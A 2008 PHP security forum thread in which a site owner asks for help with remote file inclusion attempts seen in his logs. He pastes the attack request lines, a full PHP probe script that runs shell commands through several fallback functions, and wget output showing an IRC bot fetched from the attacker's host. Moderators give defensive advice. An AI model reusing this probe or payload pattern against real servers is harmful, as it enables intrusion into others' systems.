PHP Injection Exploit

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
bcarpio
Forum Newbie
Posts: 5
Joined: Mon Mar 24, 2008 10:02 pm

PHP Injection Exploit

Post by bcarpio »

I keep seeing these in my logs (xxx.xxx.xxx.xxx is my servers IP)

xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:13 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"


xxx.xxx.xxx.xxx - - [23/Mar/2008:08:05:17 -0700] "GET /?config%255broot_dir%255d=http://imoet.100webspace.net/gambar.jpg%3f HTTP/1.1" 200 7925 "-" "libwww-perl/5.805"


You will notice the 200 success code.

If you download this gambar.jpg file, you will see that it is a php script:

------- start gambar.jpg -------

Code: Select all

<?
$dir = @getcwd();
$ker = @php_uname();
echo "3"."1"."3"."3"."7"."<br>";
$OS = @PHP_OS;
echo "<br>OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir); 
if ($free === FALSE) {$free = 0;} 
if ($free < 0) {$free = 0;} 
echo "Free:".view_size($free)."<br>"; 
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
function view_size($size) 
{ 
if (!is_numeric($size)) {return FALSE;} 
else 
{ 
if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 
elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 
elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 
else {$size = $size . " B";} 
return $size; 
}
} 
 
echo "<br>3"."1"."2"."3"."4<br>";
?>
--------------------------------------------

My hosting company has alerted me to this issue, I'm not sure what this script does that allows for a PHP injection if anything... if someone can help me put the pieces together that would be great.
User avatar
Weirdan
Moderator
Posts: 5978
Joined: Mon Nov 03, 2003 6:13 pm
Location: Odessa, Ukraine

Re: PHP Injection Exploit

Post by Weirdan »

Are you running aMember Pro?
bcarpio
Forum Newbie
Posts: 5
Joined: Mon Mar 24, 2008 10:02 pm

Re: PHP Injection Exploit

Post by bcarpio »

No,

There are 100s of logs from the attacker searching for aMember Pro to phpBB... but I am not running any of them... the thing is that the site that shows the 200 is just a static HTML site.. the rest of my sites run Joomla but I don't see any of these in the logs for the sites running Joomla.

The other odd thing is that the pk.txt file is uploaded to /tmp/.ICE-unix
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: PHP Injection Exploit

Post by Mordred »

1. It's getting a 200, because it's requesting / (which exists)
The other text is after the ?, meaning it's part of the query.

2. Have you tried accessing the same URL on your server to see what happens? My guess is - nothing.
It's just a stupid bot trying its luck with you.

3. Wait... what pk.txt ?
bcarpio
Forum Newbie
Posts: 5
Joined: Mon Mar 24, 2008 10:02 pm

Re: PHP Injection Exploit

Post by bcarpio »

Yes, I believe that somehow this script hidden in gambar.jpg is somehow allowing my server to be exploited. If you see this:
http://imoet.100webspace.net/gambar.jpg

Now let me show you an exert from my error_log:

-------------------------------------------

error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
--04:48:44-- http://imoet.100webspace.net/pk.txt
Resolving imoet.100webspace.net... 64.72.112.169
Connecting to imoet.100webspace.net|64.72.112.169|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84143 (82K) [text/plain]
Saving to: `pk.txt'

0K .......... .......... .......... .......... .......... 60% 239K 0s
50K .......... .......... .......... .. 100% 622K=0.3s

04:48:44 (315 KB/s) - `pk.txt' saved [84143/84143]

error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key
error: "kern.osrelease" is an unknown key
error: "kern.ostype" is an unknown key

-----------------------------------

You can see that this site is somehow exploiting my server to upload a pk.txt file. This PK.txt file is an IRC bot which eventually is used to attack other sites, but I assume that the initial attack begins with the gambar.jpg.
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: PHP Injection Exploit

Post by Mordred »

1. Disable this if you're not using it:
http://bg.php.net/manual/en/ref.filesys ... -url-fopen

2. Copy your logs aside, collect all occurances like the ones you showed us. Maybe the bot is trying a few known RFI holes and is finding one - finding which one will allow you to patch the root cause of the vulnerability.
bcarpio
Forum Newbie
Posts: 5
Joined: Mon Mar 24, 2008 10:02 pm

Re: PHP Injection Exploit

Post by bcarpio »

Yea I have register_globals = Off and allow_url_fopen = Off.

I guess all I can really do is keep going through the logs and try and find a URL they passed that "worked". ?

Any other suggestions?
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Re: PHP Injection Exploit

Post by Mordred »

If you're sure you have allow_url_fopen = Off, then the hole being exploited is NOT RFI.
User avatar
Weirdan
Moderator
Posts: 5978
Joined: Mon Nov 03, 2003 6:13 pm
Location: Odessa, Ukraine

Re: PHP Injection Exploit

Post by Weirdan »

bcarpio wrote: Now let me show you an exert from my error_log:
[.................................]
--04:48:44-- http://imoet.100webspace.net/pk.txt
Resolving imoet.100webspace.net... 64.72.112.169
Connecting to imoet.100webspace.net|64.72.112.169|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84143 (82K) [text/plain]
Saving to: `pk.txt'

0K .......... .......... .......... .......... .......... 60% 239K 0s
50K .......... .......... .......... .. 100% 622K=0.3s

04:48:44 (315 KB/s) - `pk.txt' saved [84143/84143]
[...............................]
Looks like an output from wget
bcarpio
Forum Newbie
Posts: 5
Joined: Mon Mar 24, 2008 10:02 pm

Re: PHP Injection Exploit

Post by bcarpio »

Hmm apparently my problem is related to this:

http://www.heise-online.co.uk/security/ ... news/75459

I use joomla on almost all of my sites, although I am not running this "Perform" component there must be another component that is being compromised. The odd thing is I do have register_globals=Off in my php.ini.
Post Reply